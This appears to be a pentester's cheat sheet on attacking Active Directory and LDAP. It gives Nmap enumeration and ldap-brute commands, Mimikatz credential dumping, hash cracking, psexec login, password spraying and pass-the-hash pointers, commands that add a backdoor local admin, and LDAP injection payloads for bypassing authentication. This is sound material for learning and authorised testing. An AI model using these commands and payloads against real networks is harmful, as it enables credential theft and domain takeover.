- Active Directory Domain Services Overview
- Domain Controller Roles
- Active Directory: LDAP Syntax Filter
- SAM-Account-Type attribute
- Derivative Local Admin
- Predefined service accounts: LocalSystem | LocalService | NetworkService
- Spray-Passwords
- Extracting Password Hashes from the NTDS.dit File
- Pentesting LDAP (HackTricks)
- Attack Methods for Gaining Domain Admin Rights in Active Directory
- Active Directory Kill Chain Attack & Defense
- Pentesting Active Directory (xmind schema)
- Active Directory Attacks (good examples, zerologon, printnightmare, etc.)
- Introduction to Active Directory (HTB)
Tools: Mimikatz, PowerView, ldapsearch, BloodHound. See Pass-the-Hash, Overpass the Hash/Pass the Key.
Nmap scripts
TCP 389 LDAP plain text
TCP 636 LDAP SSL connection
TCP 3268 LDAP connection to Global Catalog
TCP 3269 LDAP connection to Global Catalog over SSL
389,636,3268,3269ls -la /usr/share/nmap/scripts/ldap*ldap-brute.nse ldap-novell-getpass.nse ldap-rootdse.nse ldap-search.nsenmap -Pn -sV -p 389,636,3268,3269 --script=ldap* -d $IP# Using anonymous credentials, all ldap scripts except brute
nmap -Pn -n -sV -p 389,636,3268,3269 --script "ldap* and not brute" $IP -oA nmap-ldapEnumerate users
nmap -Pn -p 389,636,3268,3269 --script ldap-search --script-args 'ldap.qfilter=users' $IP -oN nmap-ldap-search-usersawk -F "sAMAccountName: " '$2{print $2}' nmap-ldap-search-users | sortgrep -i -E "sAMAccountName|dn:|pass" nmap-ldap-search-users# Look for passwords!
nmap -Pn -p 389,636,3268,3269 --script ldap-search --script-args 'ldap.qfilter=users,ldap.attrib=sAMAccountName' $IP -oN nmap-ldap-search-usersnmap -Pn -p 389,636,3268,3269 --script ldap-search --script-args 'ldap.username="cn=Full Username,cn=Users,dc=example,dc=com",ldap.password=MyPassword,ldap.qfilter=users,ldap.attrib=sAMAccountName' $IPBrute force passwords
Users must be Distinguished Names (DN), not sAMAccountName! Like username@example.com
nmap -p 389,636,3268,3269 --script ldap-brute --script-args userdb=users-dn.txt,passdb=passwords.txt $IPnmap -p 389,636,3268,3269 --script ldap-brute --script-args userdb=users-dn.txt $IPUSERS=/usr/share/seclists/Usernames/Names/names.txt
DOMAIN=example.com
nmap -p 389,636,3268,3269 --script ldap-brute --script-args userdb=${USERS},ldap.upnsuffix=${DOMAIN} $IPAuthentication
WDigest
Protocol used by older operating systems (Windows 7, Windows Server 2008 R2). See Microsoft documentation.
Credentials are stored in memory in clear text! Use Mimikatz.
NTLM Authentication
Protocol used when connecting to a server with IP address, or if the hostname is NOT registered on the AD integrated DNS server, or by third-party application choosing NTLM authentication. See Microsoft Documentation.
Use Mimikatz to dump the SAM database and obtain NTLM hashes. Crack them using Hashcat (hash type: 1000).
Kerberos Authentication
Crack the Kerberos service ticket to obtain the clear text password for the service account. The service ticket is encrypted using the SPN’s password hash.
See Kerberoasting.
Lateral Movement
There are 2 known lateral movement techniques for impersonating valid users or service accounts using hashes: Pass The Hash and Over Pass The Hash.
Hash cracking
When NTLM hashes are obtained using Mimikatz, crack them with Hashcat (hash type: 1000) or online cracking tools. See Password Attacks. Once passwords are found, try connecting to the machine.
Connect to the machine
impacket-psexec -dc-ip x.x.x.x example.com/username:password@y.y.y.y- Try a password spray when there are numbers at the end of the password! Use the Nmap NSE script ldap-brute (see top of this page) or use Hydra on Samba.
- Try Kerberoasting using the credentials found.
- If port 5985 is open, try Evil-WinRm.
- Do more enumeration! Use Impacket and authenticated ldapsearch.
Pass the Hash
See Pass-the-Hash. NTLM online hash generator.
Overpass the Hash/Pass the Key
Use the NTLM hash of another user account to obtain a Kerberos ticket (TGT) which can be used to access network resources. We can only use the TGT on the machine it was created for.
See Overpass the Hash/Pass the Key.
Pass the Ticket
TGS allows more flexibility than Overpass the Hash.
See Pass the Ticket.
Distributed Component Object Model (DCOM)
TO COMPLETE 🙁 Look at impacket-dcomexec.
Active Directory ACLs/ACEs Abuse
After running BloodHound, if you find privileges like “GenericAll”, “GenericWrite”, “Write”, “WriteProperty”, “Self”, “WriteOwner”, “ForceChangePassword”, “WriteDACL”, see Active Directory ACLs/ACEs Abuse.
Persistence
Golden Ticket
See Mimikatz.
Domain Controller Synchronization
TO COMPLETE 🙁
Privilege Escalation
Use a client-side attack to get first access to a computer with an AD user. You will need to get a local administrator.
- Check logged in users with PowerView. Their credentials are stored in memory. Requires local admin to dump the credentials using Mimikatz.
Ways to control the Domain
- Compromise a user in the Domain Admins group. This group gives complete control over all computers joined to that domain.
- Compromise a domain controller. It can be used to modify any joined computers or execute applications/services on them.
Domain controllers contain all the password hashes of all user accounts in that domain.
Active Directory (AD)
When Active Directory is configured, a domain is created with <organisation name>.com. Objects are organized in Organizational Units (OU) acting as containers (like folders) containing user/computer objects. Objects can have different properties.
Active Directory relies heavily on the Domain Name System (DNS). Typical domain controllers will also host an authoritative DNS server for the domain.
Command Examples
# Get domain name
net view /DOMAIN
# List domain users
net user /DOMAIN
# Current user details (e.g. user rights: if admin, Local Group Memberships: *Administrators)
net user "%username%" /DOMAIN
# List groups in AD
net group /DOMAIN
# List members of a group
net group group_name /DOMAIN
net group "Domain Administrators" /DOMAIN
# Test credentials
runas /user:DOMAIN\username C:\Windows\System32\cmd.exeUsers & Groups & Active Directory (AD)
Local
# List local users
net user
# Current user details (e.g. user rights: if admin, Local Group Memberships: *Administrators)
net user "%username%"
# Create local user
net user myuser password /add
# Create local user and add user to local groups
net user /add myuser "password"
net localgroup "Administrators" myuser /add
net localgroup "Remote Desktop Users" myuser /add
# List local groups on the machine
net localgroup
# List members of a group
net localgroup Administrateurs
net localgroup AdministratorsChange user password
Open a command prompt with Run as administrator, even when logged in as an administrator. Requires high integrity level in UAC.
net user USERNAME mynewpassword# Reset user password, * means password will be requested
net user USERNAME *Exploits
LDAP
LDAP provider path
LDAP provider path is needed to perform LDAP queries against the domain controller.
LDAP://DC01.example.com/DC=example,DC=comLDAP Injection
LDAP injection testing is similar to SQL Injection testing. The differences are that testers use the LDAP protocol instead of SQL and the target is an LDAP Server instead of a SQL Server. An LDAP Injection attack breaks the following pattern:
Input -> Query LDAP == LDAP injection
Enter admin)(&)) in username to bypass authentication
Making Uname=admin)(&)) and introducing any string as the Pwd value, the following query is constructed and sent to the server:
(& (USER=admin)(&))(PASSWORD=Pwd))From CTF LDAP Authentication challenge:
username=)(|(uid=&password=)
Should give this string: (&(uid=)(|(uid=)(userPassword=)))